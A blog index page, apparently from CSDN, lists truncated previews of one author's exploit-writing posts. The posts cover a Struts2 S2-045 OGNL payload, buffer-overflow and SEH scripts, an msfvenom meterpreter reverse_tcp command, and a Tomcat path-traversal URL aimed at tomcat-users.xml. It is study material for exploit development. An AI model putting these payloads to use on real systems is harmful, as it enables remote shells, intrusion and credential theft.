exploit
Nixawk
这个作者很懒,什么都没留下…
展开
-
exploit - win32 - stack winding and unwinding
In order to understand function stack, we create the demo code. #include <stdio.h>#include <stdlib.h>int function3(int i3){ char *local_var1_f3 = "Function3"; return 3;}int function2(int i2){原创 2015-06-16 07:56:09 · 696 阅读 · 0 评论 -
Exploit - mysql unsha1
mysql-unsha1Authenticate against a MySQL server without knowing the cleartext password.AbstractThis PoC shows how it is possible to authenticate against a MySQL server under certain circumstances with原创 2017-03-27 11:45:47 · 1351 阅读 · 0 评论 -
Exploit - RFID
RFID HackingPrepareInstall Proxmark3Check Proxmark3 / card statusCrack KeysPRNG AttackNESTED AttackDump data & Write dataPrepareInstall Proxmark3$ sudo apt-get install git build-essential libread原创 2017-04-01 13:24:32 · 2078 阅读 · 0 评论 -
exploit - dahua camera backdoor
Just for security assessment. If you can exploit the dahua camera devices, username/password/cookies can be used to access camera video.Exploit CodeI’ll share it later.$ python exploit_dahua.py 192.168原创 2017-03-17 17:13:15 · 11112 阅读 · 0 评论 -
exploit - CVE-2017-5638 - Apache Struts2 S2-045
Metasploit-FrameworkExp Code#!/usr/bin/python# -*- coding: utf-8 -*-import urllib2import httplibdef exploit(url, cmd): payload = "%{(#_='multipart/form-data')." payload += "(#dm=@ognl.OgnlCo原创 2017-03-07 17:13:45 · 5677 阅读 · 1 评论 -
exploit - SLMail 5.5 - POP3 PASS Buffer Overflow Exploit
https://www.exploit-db.com/exploits/638/#!/usr/bin/python# -*- encoding: utf-8 -*-import sysimport socketimport struct## OS Name: Microsoft Windows XP Professional# OS Version:原创 2016-07-26 22:30:52 · 3270 阅读 · 0 评论 -
exploit - ClamAV servers vulnerable to unauthenticated clamav comand execution.
ClamAV® is an open source antivirus engine for detecting trojans, viruses, malware & other malicious threats.Setup Clamav Environment$ sudo apt-get install clamav clamav-daemon$ sudo freshclam$ sudo原创 2016-06-14 10:51:14 · 959 阅读 · 0 评论 -
Exploit writing tutorial part1: Stack Based Overflows
Author: Corelan Team (corelanc0d3r) Modify: Nixawk This tutorial will show you how to exploit a software from stack overflow.RequirementsSoftware: Easy RM to MP3 Converter Version 2.7.3.700.2006.09转载 2015-06-28 14:30:46 · 2337 阅读 · 0 评论 -
windbg - Byakugan
1. Install Byakuganlab:bin/ $ pwd/home/someone/metasploit-framework/external/source/byakugan/binlab:bin/ $ tree.├── Vista│ ├── byakugan.dll│ ├── detoured.dll│ └── injectsu.dll├── Win7│原创 2015-06-22 23:12:08 · 1569 阅读 · 0 评论 -
exploit - Immunity Debugger - PyCommands List
PyCommand Description================= ============================================================================================acrocache Dumps Acrobat Reader Cache state原创 2015-06-23 20:57:27 · 909 阅读 · 0 评论 -
windbg - command manual
--------------------Help commands--------------------0:000> !helpdiskspace <DriveLetter>[:] - Displays free disk space for specified volumeaddress [address] - Displays the address space la原创 2015-06-24 13:58:38 · 1365 阅读 · 0 评论 -
exploit - write metasploit exploit script
Create Vuln ServerCompile the source code with VC6.0 / Dev C++. #include <iostream.h>#include <stdio.h>#include <winsock.h>#include <windows.h>//load windows socket#pragma comment(lib, "wsock32.lib原创 2015-06-22 19:23:33 · 1686 阅读 · 1 评论 -
exploit - mona.py - the manual
mona.pyInstall mona.pyPut mona.py into C:\Program Files\Immunity Inc\Immunity Debugger\PyCommandsBasic usageOpen Immunity Debugger. At the bottom of the application you should see an input box (comm原创 2015-02-27 14:07:31 · 3654 阅读 · 0 评论 -
exploit - stack overflow with seh
Demo Prog:Exploit Code#!/usr/bin/env python# -*- coding: utf8 -*-# Author: Nixawkfpath = "C:\Program Files\SoriTong\Skin\Default\UI.txt"with open(fpath, "w") as f: junk = "A" * 584 nseh = "\xE原创 2015-06-22 16:40:13 · 889 阅读 · 0 评论 -
exploit - windbg - find "jmp esp"
Demo Program: Easy RM to MP3 Converter Demo Platform: Windows XP SP3Exploit StackOverflowFinal exploit code as follow:#!/usr/bin/env python# -*- coding: utf8 -*-with open("windbg_crash.m3u", "w") as原创 2015-06-20 22:07:19 · 2274 阅读 · 0 评论 -
exploit - simple stack overflow - BlazeDVD Pro player 6.1
Poc: BlazeDVD Pro player 6.1 Local stack based buffer overflowPuN1sh3r show us how to exploit BlazeDVD Pro player 6.1 on Windows 2003 server sp1(EN). Now, I’ll show you poc on Windows xp sp3.#!/usr/b原创 2015-06-19 21:25:16 · 847 阅读 · 0 评论 -
msfvenom / ndisasm - disass shellcode
root:~ /# msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 -a x86 -f raw --platform win | ndisasm -u -Found 0 compatible encoders00000000 FC cld00000001 E886000000原创 2015-06-18 00:17:29 · 1285 阅读 · 0 评论 -
Exploit - Apache Tomcat Directory/Path Traversal
http://localhost:8080/manager/text/deploy?path=/foo&config=D:/TESTING/Java/run/apache-tomcat-7.0.76/conf/tomcat-users.xml&war=1&version=/../../../../webapps/manager/usersPrevious URL would copy file na转载 2017-04-06 18:20:06 · 2338 阅读 · 0 评论